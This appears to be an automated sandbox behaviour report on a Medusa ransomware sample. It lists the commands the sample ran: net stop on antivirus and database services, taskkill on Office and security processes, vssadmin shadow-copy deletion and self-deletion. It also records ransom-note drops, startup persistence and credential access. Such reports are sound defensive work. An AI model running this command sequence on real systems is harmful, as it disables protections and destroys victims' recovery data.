C:\Windows\SysWOW64\net.exe

net stop "ekrn" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ekrn" /y

C:\Windows\SysWOW64\net.exe

net stop "ESHASRV" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ESHASRV" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "AVP" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AVP" /y

C:\Windows\SysWOW64\net.exe

net stop "klnagent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "klnagent" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "kavfsslp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "kavfsslp" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFSGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFSGT" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFS" /y

C:\Windows\SysWOW64\net.exe

net stop "mfefire" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfefire" /y

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM zoolz.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM agntsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbeng50.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbsnmp.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM encsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM excel.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefoxconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM infopath.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM isqlplussvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msaccess.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msftesql.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mspub.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopqos.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-nt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-opt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocautoupds.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocomm.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocssd.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM onenote.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM oracle.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM outlook.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM powerpnt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqbcoreservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlagent.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlbrowser.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM synctime.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tbirdconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat64.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thunderbird.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM visio.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winword.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wordpad.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM xfssvccon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tmlisten.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM PccNTMon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM CNTAoSMgr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ntrtscan.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 164

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 3

Network

N/A

Files

F:\!!!READ_ME_MEDUSA!!!.txt

MD5 059811161d1eb0b9c131d4ca58fb273e
SHA1 137cda40b70978a85f34afcd3e8deac116cfe460
SHA256 e2cfaba956d1da00e2f2ab03474876e7d88e5b746c5c38932af32d6abe85d90b
SHA512 73770f346044da39220bbc0c47e271562d394f14b54f30391af15f09df9d7b0a90adcc06745a5b3681c182ec1db03998cbb6d1f100e81626eae87cddd6097fdd

C:\$Recycle.Bin\S-1-5-21-1846800975-3917212583-2893086201-1000\desktop.ini

MD5 05599b3258495dbfb3ef76c9a01d7cbf
SHA1 9624a20b721f836483620a27f12d92f85e692165
SHA256 f84025034449e68ff01b4f87464cd25d737228b4e4bc12be44046c0329a9ae2e
SHA512 43584c1ec686f3abb40dfd4de38c428a99f6a954dcc086cc70bf6332045836607dc4be434ebbde4e0e1645f451ec876d3beb35ad37bb33124633e446aa50da56

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-01 13:23

Reported

2024-10-01 13:26

Platform

win10v2004-20240802-en

Max time kernel

95s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe"

Signatures

Medusa Ransomware

ransomware medusaransomware

Renames multiple (8843) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$Recycle.Bin\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Network Share Discovery

discovery

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelGlyph.16.White.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\BadgeLogo.scale-125.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\Standard.targetsize-64_contrast-black.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\WideTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_checkbox_unselected_18.svg C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\Content C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\kok.pak C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\en-US\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\webviewCore.min.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_2x.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\MicrosoftSolitaireAppList.targetsize-256_altform-unplated_contrast-black_devicefamily-colorfulunplated.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\LargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
